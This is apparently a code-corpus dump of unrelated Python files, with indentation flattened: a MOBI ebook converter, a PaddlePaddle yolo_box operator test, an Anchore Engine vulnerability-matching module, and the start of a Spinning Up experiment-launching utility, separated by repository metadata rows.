self._name = 'mobi_article_%d' % pos
if not self.title:
self.title = 'Article %d' % self.pos
def TocLink(self):
return '<a href="#%s_MOBI_START">%.80s</a>' % (self._name, self.title)
def Anchor(self):
return '<a name="%s_MOBI_START">' % self._name
def Body(self):
return self.html.RenameAnchors(self._name + '_')
class Converter:
def __init__(self, refresh_url='', title='Unknown', author='Unknown', publisher='Unknown'):
self._header = Header()
self._header.SetTitle(title)
self._header.SetAuthor(author)
self._header.SetPublisher(publisher)
self._refresh_url = refresh_url
def ConvertString(self, s):
out = BytesIO()
self._ConvertStringToFile(s, out)
return out.getvalue()
def ConvertStrings(self, html_strs):
out = BytesIO()
self._ConvertStringsToFile(html_strs, out)
return out.getvalue()
def ConvertFile(self, html_file, out_file):
self._ConvertStringToFile(open(html_file,'rb').read(),
open(out_file, 'wb'))
def ConvertFiles(self, html_files, out_file):
html_strs = [open(f,'rb').read() for f in html_files]
self._ConvertStringsToFile(html_strs, open(out_file, 'wb'))
def MakeOneHTML(self, html_strs):
"""This takes a list of HTML strings and returns a big HTML file with
all contents consolidated. It constructs a table of contents and adds
anchors within the text
"""
title_html = []
toc_html = []
body_html = []
## This gets broken by html5lib/bs4fixed being helpful, but we'll
## fix it inside mobihtml.py
PAGE_BREAK = '<mbp:pagebreak/>'
# pull out the title page, assumed first html_strs.
htmltitle = html_strs[0]
entrytitle = _SubEntry(1, htmltitle)
title_html.append(entrytitle.Body())
title_html.append(PAGE_BREAK)
toc_html.append(PAGE_BREAK)
toc_html.append('<a name="TOCTOP"><h3>Table of Contents</h3><br />')
for pos, html in enumerate(html_strs[1:]):
entry = _SubEntry(pos+1, html)
toc_html.append('%s<br />' % entry.TocLink())
# give some space between bodies of work.
body_html.append(PAGE_BREAK)
body_html.append(entry.Anchor())
body_html.append(entry.Body())
# TODO: this title can get way too long with RSS feeds. Not sure how to fix
# cheat slightly and use the <a href> code to set filepos in references.
header = '''<html>
<head>
<title>Bibliorize %s GMT</title>
<guide>
<reference href="#TOCTOP" type="toc" title="Table of Contents"/>
</guide>
</head>
<body>
''' % time.ctime(time.time())
footer = '</body></html>'
# logger.debug("header:%s"%header)
# logger.debug("title_html:%s"%title_html)
# logger.debug("toc_html:%s"%toc_html)
# logger.debug("body_html:%s"%body_html)
# logger.debug("footer:%s"%footer)
all_html = header + '\n'.join(title_html + toc_html + body_html) + footer
#print "%s" % all_html.encode('utf8')
return all_html
def _ConvertStringsToFile(self, html_strs, out_file):
try:
tmp = self.MakeOneHTML(html_strs)
self._ConvertStringToFile(tmp, out_file)
except Exception as e:
raise
logger.error('Error %s', e)
# logger.debug('Details: %s' % html_strs)
def _ConvertStringToFile(self, html_data, out):
html = HtmlProcessor(html_data)
data = ensure_binary(html.CleanHtml())
# collect offsets of '<mbp:pagebreak>' tags, use to make index list.
# indexlist = [] # list of (offset,length) tuples.
# not in current use.
# j=0
# lastj=0
# while True:
# j=data.find('<mbp:pagebreak>',lastj+10) # plus a bit so we find the next.
# if j < 0:
# break
# indexlist.append((lastj,j-lastj))
# print "index offset: %d length: %d" % (lastj,j-lastj)
# lastj=j
records = []
# title = html.title
# if title:
# self._header.SetTitle(title)
record_id = 1
# logger.debug("len(data):%s"%len(data))
for start_pos in range(0, len(data), Record.MAX_SIZE):
end = min(len(data), start_pos + Record.MAX_SIZE)
record_data = data[start_pos:end]
records.append(self._header.AddRecord(record_data, record_id))
# logger.debug("HTML Record %03d: (size:%d) [[%s ... %s]]" % ( record_id, len(record_data), record_data[:20], record_data[-20:] ))
record_id += 1
self._header.SetImageRecordIndex(record_id)
records[0:0] = [self._header.MobiHeader()]
header, rec_offset = self._header.PDBHeader(len(records))
out.write(ensure_binary(header))
for record in records:
record.WriteHeader(out, rec_offset)
# logger.debug("rec_offset: %d len(record.data): %d" % (rec_offset,len(record.data)))
rec_offset += (len(record.data)+1) # plus one for trailing null
# Write to nuls for some reason
out.write(b'\0\0')
for record in records:
record.WriteData(out)
out.write(b'\0')
# needs a trailing null, I believe it indicates zero length 'overlap'.
# otherwise, the readers eat the last char of each html record.
# Calibre writes another 6-7 bytes of stuff after that, but we seem
# to be getting along without it.
class Record:
MAX_SIZE = 4096
INDEX_LEN = 8
_unique_id_seed = 28 # should be arbitrary, but taken from MobiHeader
# TODO(chatham): Record compression doesn't look that hard.
def __init__(self, data, record_id):
assert len(data) <= self.MAX_SIZE
self.data = data
if record_id != 0:
self._id = record_id
else:
Record._unique_id_seed += 1
self._id = 0
def __repr__(self):
return 'Record: id=%d len=%d' % (self._id, len(self.data))
def _SetUniqueId(self):
Record._unique_id_seed += 1
# TODO(chatham): Wraparound crap
self._id = Record._unique_id_seed
def WriteData(self, out):
out.write(ensure_binary(self.data))
def WriteHeader(self, out, rec_offset):
attributes = 64 # dirty?
header = struct.pack('>IbbH',
rec_offset,
attributes,
0, self._id)
assert len(header) == Record.INDEX_LEN
out.write(ensure_binary(header))
EXTH_HEADER_FIELDS = {
'author' : 100,
'publisher' : 101,
}
class Header:
EPOCH_1904 = 2082844800
def __init__(self):
self._length = 0
self._record_count = 0
self._title = '2008_2_34'
self._author = 'Unknown author'
self._publisher = 'Unknown publisher'
self._first_image_index = 0
def SetAuthor(self, author):
self._author = author.encode('ascii','ignore')
def SetTitle(self, title):
# TODO(chatham): Reevaluate whether this needs to be ASCII.
# maybe just do sys.setdefaultencoding('utf-8')? Problems
# appending self._title with other things.
self._title = title.encode('ascii','ignore')
def SetPublisher(self, publisher):
self._publisher = publisher.encode('ascii','ignore')
def AddRecord(self, data, record_id):
self.max_record_size = max(Record.MAX_SIZE, len(data))
self._record_count += 1
# logger.debug("len(data):%s"%len(data))
self._length += len(data)
return Record(data, record_id)
def _ReplaceWord(self, data, pos, word):
return data[:pos] + struct.pack('>I', word) + data[pos+4:]
def PalmDocHeader(self):
compression = 1 # no compression
unused = 0
encryption_type = 0 # no ecryption
records = self._record_count + 1 # the header record itself
palmdoc_header = struct.pack('>HHIHHHH',
compression,
unused,
self._length,
records,
Record.MAX_SIZE,
encryption_type,
unused)
assert len(palmdoc_header) == 16
return palmdoc_header
def PDBHeader(self, num_records):
# logger.debug("num_records:%s"%num_records)
HEADER_LEN = 32+2+2+9*4
RECORD_INDEX_HEADER_LEN = 6
RESOURCE_INDEX_LEN = 10
index_len = RECORD_INDEX_HEADER_LEN + num_records * Record.INDEX_LEN
rec_offset = HEADER_LEN + index_len + 2
# logger.debug("index_len:%s"%index_len)
# logger.debug("rec_offset:%s"%rec_offset)
short_title = self._title[0:31]
attributes = 0
version = 0
ctime = self.EPOCH_1904 + int(time.time())
mtime = self.EPOCH_1904 + int(time.time())
backup_time = self.EPOCH_1904 + int(time.time())
modnum = 0
appinfo_offset = 0
sort_offset = 0
type = b'BOOK'
creator = b'MOBI'
id_seed = 36
header = struct.pack('>32sHHII',
ensure_binary(short_title), attributes, version,
ctime, mtime)
header += struct.pack('>IIII', backup_time, modnum,
appinfo_offset, sort_offset)
header += struct.pack('>4s4sI',
type, creator, id_seed)
next_record = 0 # not used?
header += struct.pack('>IH', next_record, num_records)
return header, rec_offset
def _GetExthHeader(self):
# They set author, publisher, coveroffset, thumboffset
data = {'author' : self._author,
'publisher' : self._publisher,
}
# Turn string type names into EXTH typeids.
r = []
for key, value in data.items():
typeid = EXTH_HEADER_FIELDS[key]
length_encoding_len = 8
r.append(struct.pack('>LL', typeid, len(value) + length_encoding_len,) + value)
content = b''.join(r)
# logger.debug("len(content):%s"%len(content))
# Pad to word boundary
while len(content) % 4:
content += b'\0'
# logger.debug("len(content):%s"%len(content))
TODO_mysterious = 12
exth = b'EXTH' + struct.pack('>LL', len(content) + TODO_mysterious, len(data)) + content
return exth
def SetImageRecordIndex(self, idx):
self._first_image_index = idx
def MobiHeader(self):
exth_header = self._GetExthHeader();
palmdoc_header = self.PalmDocHeader()
fs = 0xffffffff
# Record 0
header_len = 0xE4 # TODO
mobi_type = 2 # BOOK
text_encoding = encoding['UTF-8']
unique_id = random.randint(1, 1<<32)
creator_version = 4
reserved = b'%c' % 0xff * 40
nonbook_index = fs
# logger.debug("header_len:%s"%header_len)
# logger.debug("len(palmdoc_header):%s"%len(palmdoc_header))
# logger.debug("len(exth_header):%s"%len(exth_header))
full_name_offset = header_len + len(palmdoc_header) + len(exth_header) # put full name after header
language = languages['en-us']
unused = 0
mobi_header = struct.pack('>4sIIIII40sIIIIII',
b'MOBI',
header_len,
mobi_type,
text_encoding,
unique_id,
creator_version,
reserved,
nonbook_index,
full_name_offset,
len(self._title),
language,
fs, fs)
assert len(mobi_header) == 104 - 16
unknown_fields = chr(0) * 32
drm_offset = 0
drm_count = 0
drm_size = 0
drm_flags = 0
exth_flags = 0x50
header_end = chr(0) * 64
mobi_header += struct.pack('>IIIIIII',
creator_version,
self._first_image_index,
fs,
unused,
fs,
unused,
exth_flags)
mobi_header += b'\0' * 112 # TODO: Why this much padding?
# Set some magic offsets to be 0xFFFFFFF.
for pos in (0x94, 0x98, 0xb0, 0xb8, 0xc0, 0xc8, 0xd0, 0xd8, 0xdc):
mobi_header = self._ReplaceWord(mobi_header, pos, fs)
# 16 bytes?
padding = b'\0' * 48 * 4 # why?
total_header = palmdoc_header + mobi_header + exth_header + self._title + padding
return self.AddRecord(total_header, 0)
if __name__ == '__main__':
import sys
m = Converter(title='Testing Mobi', author='Mobi Author', publisher='mobi converter')
m.ConvertFiles(sys.argv[1:], 'test.mobi')
#m.ConvertFile(sys.argv[1], 'test.mobi')
| 32.25
| 136
| 0.611263
|
416e6ea9f412d86db877fc36175e8b910b0613fe
| 4,262
|
py
|
Python
|
python/paddle/fluid/tests/unittests/test_yolo_box_op.py
|
ysh329/Paddle
|
50ad9046c9a440564d104eaa354eb9df83a35678
|
[
"Apache-2.0"
] | 3
|
2019-07-17T09:30:31.000Z
|
2021-12-27T03:16:55.000Z
|
python/paddle/fluid/tests/unittests/test_yolo_box_op.py
|
ysh329/Paddle
|
50ad9046c9a440564d104eaa354eb9df83a35678
|
[
"Apache-2.0"
] | 1
|
2019-05-26T14:23:24.000Z
|
2019-05-26T14:23:51.000Z
|
python/paddle/fluid/tests/unittests/test_yolo_box_op.py
|
ysh329/Paddle
|
50ad9046c9a440564d104eaa354eb9df83a35678
|
[
"Apache-2.0"
] | 4
|
2019-09-30T02:15:34.000Z
|
2019-09-30T02:41:30.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import unittest
import numpy as np
from op_test import OpTest
from paddle.fluid import core
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-1.0 * x))
def YoloBox(x, img_size, attrs):
n, c, h, w = x.shape
anchors = attrs['anchors']
an_num = int(len(anchors) // 2)
class_num = attrs['class_num']
conf_thresh = attrs['conf_thresh']
downsample = attrs['downsample']
input_size = downsample * h
x = x.reshape((n, an_num, 5 + class_num, h, w)).transpose((0, 1, 3, 4, 2))
pred_box = x[:, :, :, :, :4].copy()
grid_x = np.tile(np.arange(w).reshape((1, w)), (h, 1))
grid_y = np.tile(np.arange(h).reshape((h, 1)), (1, w))
pred_box[:, :, :, :, 0] = (grid_x + sigmoid(pred_box[:, :, :, :, 0])) / w
pred_box[:, :, :, :, 1] = (grid_y + sigmoid(pred_box[:, :, :, :, 1])) / h
anchors = [(anchors[i], anchors[i + 1]) for i in range(0, len(anchors), 2)]
anchors_s = np.array(
[(an_w / input_size, an_h / input_size) for an_w, an_h in anchors])
anchor_w = anchors_s[:, 0:1].reshape((1, an_num, 1, 1))
anchor_h = anchors_s[:, 1:2].reshape((1, an_num, 1, 1))
pred_box[:, :, :, :, 2] = np.exp(pred_box[:, :, :, :, 2]) * anchor_w
pred_box[:, :, :, :, 3] = np.exp(pred_box[:, :, :, :, 3]) * anchor_h
pred_conf = sigmoid(x[:, :, :, :, 4:5])
pred_conf[pred_conf < conf_thresh] = 0.
pred_score = sigmoid(x[:, :, :, :, 5:]) * pred_conf
pred_box = pred_box * (pred_conf > 0.).astype('float32')
pred_box = pred_box.reshape((n, -1, 4))
pred_box[:, :, :2], pred_box[:, :, 2:4] = \
pred_box[:, :, :2] - pred_box[:, :, 2:4] / 2., \
pred_box[:, :, :2] + pred_box[:, :, 2:4] / 2.0
pred_box[:, :, 0] = pred_box[:, :, 0] * img_size[:, 1][:, np.newaxis]
pred_box[:, :, 1] = pred_box[:, :, 1] * img_size[:, 0][:, np.newaxis]
pred_box[:, :, 2] = pred_box[:, :, 2] * img_size[:, 1][:, np.newaxis]
pred_box[:, :, 3] = pred_box[:, :, 3] * img_size[:, 0][:, np.newaxis]
for i in range(len(pred_box)):
pred_box[i, :, 0] = np.clip(pred_box[i, :, 0], 0, np.inf)
pred_box[i, :, 1] = np.clip(pred_box[i, :, 1], 0, np.inf)
pred_box[i, :, 2] = np.clip(pred_box[i, :, 2], -np.inf,
img_size[i, 1] - 1)
pred_box[i, :, 3] = np.clip(pred_box[i, :, 3], -np.inf,
img_size[i, 0] - 1)
return pred_box, pred_score.reshape((n, -1, class_num))
class TestYoloBoxOp(OpTest):
def setUp(self):
self.initTestCase()
self.op_type = 'yolo_box'
x = np.random.random(self.x_shape).astype('float32')
img_size = np.random.randint(10, 20, self.imgsize_shape).astype('int32')
self.attrs = {
"anchors": self.anchors,
"class_num": self.class_num,
"conf_thresh": self.conf_thresh,
"downsample": self.downsample,
}
self.inputs = {
'X': x,
'ImgSize': img_size,
}
boxes, scores = YoloBox(x, img_size, self.attrs)
self.outputs = {
"Boxes": boxes,
"Scores": scores,
}
def test_check_output(self):
self.check_output()
def initTestCase(self):
self.anchors = [10, 13, 16, 30, 33, 23]
an_num = int(len(self.anchors) // 2)
self.batch_size = 32
self.class_num = 2
self.conf_thresh = 0.5
self.downsample = 32
self.x_shape = (self.batch_size, an_num * (5 + self.class_num), 13, 13)
self.imgsize_shape = (self.batch_size, 2)
if __name__ == "__main__":
unittest.main()
| 36.118644
| 80
| 0.561708
|
fddb4a0361df86b718d4c75e7b6ec40f832e4132
| 15,781
|
py
|
Python
|
anchore_engine/services/policy_engine/engine/vulnerabilities.py
|
Btodhunter/anchore-engine
|
0f7ce6dea5f6c24c07616355affc64fdbfe1d6ef
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/policy_engine/engine/vulnerabilities.py
|
Btodhunter/anchore-engine
|
0f7ce6dea5f6c24c07616355affc64fdbfe1d6ef
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/policy_engine/engine/vulnerabilities.py
|
Btodhunter/anchore-engine
|
0f7ce6dea5f6c24c07616355affc64fdbfe1d6ef
|
[
"Apache-2.0"
] | null | null | null |
"""
Interface for the vulnerabilities subsystem.
This component of the engine is hydrated by data from feeds or a local source.
The evaluation and model side of the system are specific to the data, so this is a layer on top of the
general feeds implementation as it consumes the feed data. Other components should interact with this layer.
Generally, this code has a lot of comments to help explain things since it can be somewhat subtle as to why things
work the way they do and often the behavior is a result of the range of cleanliness of the data itself.
"""
import time
from sqlalchemy import or_
from anchore_engine.db import DistroNamespace, get_thread_scoped_session, get_session
from anchore_engine.db import Vulnerability, ImagePackage, ImagePackageVulnerability
from anchore_engine.common import nonos_package_types, os_package_types
from anchore_engine.services.policy_engine.engine.feeds.db import get_feed_json
import threading
from .logs import get_logger
log = get_logger()
# TODO: introduce a match cache for the fix key and package key to optimize the lookup and updates since its common to
# see a lot of images with the same versions of packages installed.
class ThreadLocalFeedGroupNameCache:
"""
Simple cache used during feed syncs to caching name lookups. Here for simpler import paths, used by both feeds.VulnerabilityFeed and vulerabilities.process_updated_vulnerability functions
"""
feed_list_cache = threading.local()
@classmethod
def lookup(cls, name):
if cls.feed_list_cache and hasattr(cls.feed_list_cache, 'vuln_group_list'):
return cls.feed_list_cache.vuln_group_list and name in cls.feed_list_cache.vuln_group_list
else:
return False
@classmethod
def add(cls, names: list):
try:
for n in names:
cls.feed_list_cache.vuln_group_list.update(set(names))
except AttributeError:
cls.feed_list_cache.vuln_group_list = set(names)
@classmethod
def flush(cls):
try:
cls.feed_list_cache.vuln_group_list = None
except AttributeError:
pass
def have_vulnerabilities_for(distro_namespace_obj):
"""
Does the system have any vulnerabilities for the given distro.
:param distro_namespace_obj:
:return: boolean
"""
# All options are the same, no need to loop
# Check all options for distro/flavor mappings
db = get_thread_scoped_session()
for namespace_name in distro_namespace_obj.like_namespace_names:
feed = get_feed_json(db_session=db, feed_name='vulnerabilities')
if feed and namespace_name in [x['name'] for x in feed.get('groups', [])]:
# No records yet, but we have the feed, so may just not have any data yet
return True
else:
return False
def namespace_has_no_feed(name, version):
"""
Returns true if the given namespace has no direct CVE feed and false if it does.
:return: boolean if name,version tuple does not have a feed of its own
"""
return not ThreadLocalFeedGroupNameCache.lookup(name + ':' + version)
def find_vulnerable_image_packages(vulnerability_obj):
"""
Given a vulnerability object, find images that are affected via their package manifests.
Result may have duplicates based on match type, caller must de-dup if desired.
:param vulnerability_obj:
:return: list of ImagePackage objects
"""
db = get_thread_scoped_session()
distro, version = vulnerability_obj.namespace_name.split(':', 1)
dist = DistroNamespace(distro, version)
related_names = dist.mapped_names() # Returns list of names that map to this one, not including itself necessarily
# Filter related_names down based on the presence of actual feeds/cve data. If there is an actual feed for a name, remove it from the list.
# Only do this if the list of related names is not just the name itself. (e.g. alpine = [alpine]).
if related_names != [distro]:
# Ensure we don't include any names that actually have a feed (can happen when new feeds arrive before the mapped_names() source
# is updated to break the 'like' relation between the distros.
related_names = [x for x in related_names if namespace_has_no_feed(x, version)]
# This is a weird case because it basically means that this distro doesn't map to itself as far as mapped_names() is
# concerned, but since that could be code lagging data (e.g. new feed group added for a new distro), add the name itself
# back into the list.
if distro not in related_names and not namespace_has_no_feed(distro, version):
related_names.append(distro)
# TODO would like a better way to do the pkg_type <-> namespace_name mapping, with other side in ImagePackage.vulnerabilities_for_package
likematch = None
if ':maven' in vulnerability_obj.namespace_name or 'java' in vulnerability_obj.namespace_name:
likematch = 'java'
elif ':ruby' in vulnerability_obj.namespace_name or 'gem' in vulnerability_obj.namespace_name:
likematch = 'gem'
elif ':js' in vulnerability_obj.namespace_name or 'npm' in vulnerability_obj.namespace_name:
likematch = 'npm'
elif 'python' in vulnerability_obj.namespace_name:
likematch = 'python'
try:
affected = []
if vulnerability_obj.fixed_in:
# Check the fixed_in records
for fix_rec in vulnerability_obj.fixed_in:
package_candidates = []
# Find packages of related distro names with compatible versions, this does not have to be precise, just an initial filter.
pkgs = db.query(ImagePackage).filter(ImagePackage.distro_name.in_(related_names), ImagePackage.distro_version.like(dist.version + '%'), or_(ImagePackage.name == fix_rec.name, ImagePackage.normalized_src_pkg == fix_rec.name)).all()
package_candidates += pkgs
# add non distro candidates
if likematch:
pkgs = db.query(ImagePackage).filter(ImagePackage.pkg_type.in_(nonos_package_types), ImagePackage.pkg_type.like(likematch), or_(ImagePackage.name == fix_rec.name, ImagePackage.normalized_src_pkg == fix_rec.name)).all()
package_candidates += pkgs
for candidate in package_candidates:
if fix_rec.match_but_not_fixed(candidate):
affected.append(candidate)
# if vulnerability_obj.vulnerable_in:
# # Check the vulnerable_in records
# for vuln_rec in vulnerability_obj.vulnerable_in:
# package_candidates = []
# # Find packages of related distro names with compatible versions, this does not have to be precise, just an initial filter.
# pkgs = db.query(ImagePackage).filter(ImagePackage.distro_name.in_(related_names),
# ImagePackage.distro_version.like(dist.version + '%'),
# or_(ImagePackage.name == fix_rec.name,
# ImagePackage.normalized_src_pkg == fix_rec.name)).all()
# package_candidates += pkgs
# for candidate in package_candidates:
# if vuln_rec.match_and_vulnerable(candidate):
# affected.append(candidate)
return affected
except Exception as e:
log.exception('Failed to query and find packages affected by vulnerability: {}'.format(vulnerability_obj))
raise
def vulnerabilities_for_image(image_obj):
"""
Return the list of vulnerabilities for the specified image id by recalculating the matches for the image. Ignores
any persisted matches. Query only, does not update the data. Caller must add returned results to a db session and commit
in order to persist.
:param image_obj: the image
:return: list of ImagePackageVulnerability records for the packages in the given image
"""
# Recompute. Session and persistence in the session is up to the caller
try:
ts = time.time()
computed_vulnerabilties = []
for package in image_obj.packages:
pkg_vulnerabilities = package.vulnerabilities_for_package()
for v in pkg_vulnerabilities:
img_v = ImagePackageVulnerability()
img_v.pkg_image_id = image_obj.id
img_v.pkg_user_id = image_obj.user_id
img_v.pkg_name = package.name
img_v.pkg_type = package.pkg_type
img_v.pkg_arch = package.arch
img_v.pkg_version = package.version
img_v.pkg_path = package.pkg_path
img_v.vulnerability_id = v.vulnerability_id
img_v.vulnerability_namespace_name = v.namespace_name
computed_vulnerabilties.append(img_v)
#log.debug("TIMER VULNERABILITIES: {}".format(time.time() - ts))
return computed_vulnerabilties
except Exception as e:
log.exception('Error computing full vulnerability set for image {}/{}'.format(image_obj.user_id, image_obj.id))
raise
def rescan_image(image_obj, db_session):
"""
Rescan an image for vulnerabilities. Discards old results and rescans and persists new matches based on current data.
:param image_obj:
:param db_session:
:return:
"""
current_vulns = image_obj.vulnerabilities()
log.debug('Removing {} current vulnerabilities for {}/{} to rescan'.format(len(current_vulns), image_obj.user_id, image_obj.id))
for v in current_vulns:
db_session.delete(v)
db_session.flush()
vulns = vulnerabilities_for_image(image_obj)
log.info('Adding {} vulnerabilities from rescan to {}/{}'.format(len(vulns), image_obj.user_id, image_obj.id))
for v in vulns:
db_session.add(v)
db_session.flush()
return vulns
def delete_matches(namespace_name, db_session):
"""
Flush all vuln matches for the specified namespace.
:param namespace_name:
:return: count of records deleted
"""
#for rec in db_session.query(ImagePackageVulnerability).filter(ImagePackageVulnerability.vulnerability_namespace_name == namespace_name):
return db_session.query(ImagePackageVulnerability).filter(ImagePackageVulnerability.vulnerability_namespace_name == namespace_name).delete()
def merge_nvd_metadata_image_packages(dbsession, img_pkg_vulns, nvd_cls, cpe_cls, already_loaded_nvds=None):
"""
Same as merge_nvd_metadata but takes a list of ImagePackageVulnerabilities instead. Returns a list of (img pkg vuln, nvds list) tuples
:param dbsession:
:param img_pkg_vulns:
:param nvd_cls:
:param cpe_cls:
:param already_loaded_nvds:
:return:
"""
merged = merge_nvd_metadata(dbsession, [x.vulnerability for x in img_pkg_vulns], nvd_cls, cpe_cls, already_loaded_nvds)
return zip(img_pkg_vulns, [x[1] for x in merged])
def merge_nvd_metadata(dbsession, vulnerability_objs, nvd_cls, cpe_cls, already_loaded_nvds=None):
"""
Return a list of tuples of (vuln obj, list(nvd records)
:param dbsession active db session to use for query
:param vulnerability_objs: a list of Vulnerability objects
:param nvd_cls the class of nvd object to use for query
:param cpe_cls the class of nvd object to use for query
:return: list of tuples of (Vulnerability, list(NVD objects)) tuples
"""
if already_loaded_nvds is None:
already_loaded_nvds = []
result_list = [[x, x.get_nvd_identifiers(nvd_cls, cpe_cls) if isinstance(x, Vulnerability) else []] for x in vulnerability_objs]
nvd_ids = []
# Zip the ids into the master query list
for id in result_list:
nvd_ids.extend(id[1])
# Dedup
nvd_ids = list(set(nvd_ids).difference({rec.name for rec in already_loaded_nvds}))
# Do the db lookup for all of them
nvd_records = dbsession.query(nvd_cls).filter(nvd_cls.name.in_(nvd_ids)).all()
nvd_records.extend(already_loaded_nvds)
id_map = {x.name: x for x in nvd_records}
# Map back to the records
for entry in result_list:
entry[1] = [id_map[id] for id in entry[1] if id in id_map]
return result_list
def flush_vulnerability_matches(db, feed_name=None, group_name=None):
"""
Delete image vuln matches for the namespacename that matches the group name
:param db:
:param feed_name:
:param group_name:
:return:
"""
count = db.query(ImagePackageVulnerability).filter(ImagePackageVulnerability.vulnerability_namespace_name == group_name).delete()
log.info('Deleted {} vulnerability matches in flush for group {}'.format(count, group_name))
def process_updated_vulnerability(db, vulnerability):
"""
Update vulnerability matches for this vulnerability. This function will add objects to the db session but
will not commit. The caller is expected to manage the session lifecycle.
:param: item: The updated vulnerability object
:param: db: The db session to use, should be valid and open
:return: list of (user_id, image_id) that were affected
"""
log.spew('Processing CVE update for: {}'.format(vulnerability.id))
changed_images = []
# Find any packages already matched with the CVE ID.
current_affected = vulnerability.current_package_vulnerabilities(db)
# May need to remove vuln from some packages.
if vulnerability.is_empty():
log.spew('Detected an empty CVE. Removing all existing matches on this CVE')
# This is a flush, nothing can be vulnerable to this, so remove it from packages.
if current_affected:
log.debug('Detected {} existing matches on CVE {} to remove'.format(len(current_affected), vulnerability.id))
for pkgVuln in current_affected:
log.debug('Removing match on image: {}/{}'.format(pkgVuln.pkg_user_id, pkgVuln.pkg_image_id))
db.delete(pkgVuln)
changed_images.append((pkgVuln.pkg_user_id, pkgVuln.pkg_image_id))
else:
# Find impacted images for the current vulnerability
new_vulnerable_packages = [ImagePackageVulnerability.from_pair(x, vulnerability) for x in find_vulnerable_image_packages(vulnerability)]
unique_vuln_pkgs = set(new_vulnerable_packages)
current_match = set(current_affected)
if len(new_vulnerable_packages) > 0:
log.debug('Found {} packages vulnerable to cve {}'.format(len(new_vulnerable_packages), vulnerability.id))
log.debug('Dedup matches from {} to {}'.format(len(new_vulnerable_packages), len(unique_vuln_pkgs)))
# Find the diffs of any packages that were vulnerable but are no longer.
no_longer_affected = current_match.difference(unique_vuln_pkgs)
possibly_updated = current_match.intersection(unique_vuln_pkgs)
new_matches = unique_vuln_pkgs.difference(current_match)
if len(no_longer_affected) > 0:
log.debug('Found {} packages no longer vulnerable to cve {}'.format(len(no_longer_affected), vulnerability.id))
for img_pkg_vuln in no_longer_affected:
log.debug('Removing old invalid match for pkg {} on cve {}'.format(img_pkg_vuln, vulnerability.id))
db.delete(img_pkg_vuln)
db.flush()
for v in new_matches:
log.debug('Adding new vulnerability match: {}'.format(v))
db.add(v)
changed_images.append((v.pkg_user_id, v.pkg_image_id))
db.flush()
log.spew('Images changed for cve {}: {}'.format(vulnerability.id, changed_images))
return changed_images
| 43.836111
| 246
| 0.694379
|
b1432c59774d01c7b6c307fe92656a61571b8540
| 19,743
|
py
|
Python
|
submodules/teachDeepRL/teachDRL/spinup/utils/run_utils.py
|
JiangZehua/control-pcgrl3D
|
f9b04e65e1cbf70b7306f4df251450d83c6fb2be
|
[
"MIT"
] | null | null | null |
submodules/teachDeepRL/teachDRL/spinup/utils/run_utils.py
|
JiangZehua/control-pcgrl3D
|
f9b04e65e1cbf70b7306f4df251450d83c6fb2be
|
[
"MIT"
] | null | null | null |
submodules/teachDeepRL/teachDRL/spinup/utils/run_utils.py
|
JiangZehua/control-pcgrl3D
|
f9b04e65e1cbf70b7306f4df251450d83c6fb2be
|
[
"MIT"
] | null | null | null |
from teachDRL.spinup.user_config import DEFAULT_DATA_DIR, FORCE_DATESTAMP, \
DEFAULT_SHORTHAND, WAIT_BEFORE_LAUNCH
from teachDRL.spinup.utils.logx import colorize
from teachDRL.spinup.utils.mpi_tools import mpi_fork, msg
from teachDRL.spinup.utils.serialization_utils import convert_json
import base64
from copy import deepcopy
import cloudpickle
import json
import numpy as np
import os
import os.path as osp
import psutil
import string
import subprocess
from subprocess import CalledProcessError
import sys
from textwrap import dedent
import time
from tqdm import trange
import zlib
DIV_LINE_WIDTH = 80
def setup_logger_kwargs(exp_name, seed=None, data_dir=None, datestamp=False):
"""
Sets up the output_dir for a logger and returns a dict for logger kwargs.
If no seed is given and datestamp is false,
::
output_dir = data_dir/exp_name
If a seed is given and datestamp is false,
::
output_dir = data_dir/exp_name/exp_name_s[seed]
If datestamp is true, amend to
::
output_dir = data_dir/YY-MM-DD_exp_name/YY-MM-DD_HH-MM-SS_exp_name_s[seed]
You can force datestamp=True by setting ``FORCE_DATESTAMP=True`` in
``spinup/user_config.py``.
Args:
exp_name (string): Name for experiment.
seed (int): Seed for random number generators used by experiment.
data_dir (string): Path to folder where results should be saved.
Default is the ``DEFAULT_DATA_DIR`` in ``spinup/user_config.py``.
datestamp (bool): Whether to include a date and timestamp in the
name of the save directory.
Returns:
logger_kwargs, a dict containing output_dir and exp_name.
"""
# Datestamp forcing
datestamp = datestamp or FORCE_DATESTAMP
# Make base path
ymd_time = time.strftime("%Y-%m-%d_") if datestamp else ''
relpath = ''.join([ymd_time, exp_name])
if seed is not None:
# Make a seed-specific subfolder in the experiment directory.
if datestamp:
hms_time = time.strftime("%Y-%m-%d_%H-%M-%S")
subfolder = ''.join([hms_time, '-', exp_name, '_s', str(seed)])
else:
subfolder = ''.join([exp_name, '_s', str(seed)])
relpath = osp.join(relpath, subfolder)
data_dir = data_dir or DEFAULT_DATA_DIR
logger_kwargs = dict(output_dir=osp.join(data_dir, relpath),
exp_name=exp_name)
return logger_kwargs
def call_experiment(exp_name, thunk, seed=0, num_cpu=1, data_dir=None,
datestamp=False, **kwargs):
"""
Run a function (thunk) with hyperparameters (kwargs), plus configuration.
This wraps a few pieces of functionality which are useful when you want
to run many experiments in sequence, including logger configuration and
splitting into multiple processes for MPI.
There's also a SpinningUp-specific convenience added into executing the
thunk: if ``env_name`` is one of the kwargs passed to call_experiment, it's
assumed that the thunk accepts an argument called ``env_fn``, and that
the ``env_fn`` should make a gym environment with the given ``env_name``.
The way the experiment is actually executed is slightly complicated: the
function is serialized to a string, and then ``run_entrypoint.py`` is
executed in a subprocess call with the serialized string as an argument.
``run_entrypoint.py`` unserializes the function call and executes it.
We choose to do it this way---instead of just calling the function
directly here---to avoid leaking state between successive experiments.
Args:
exp_name (string): Name for experiment.
thunk (callable): A python function.
seed (int): Seed for random number generators.
num_cpu (int): Number of MPI processes to split into. Also accepts
'auto', which will set up as many procs as there are cpus on
the machine.
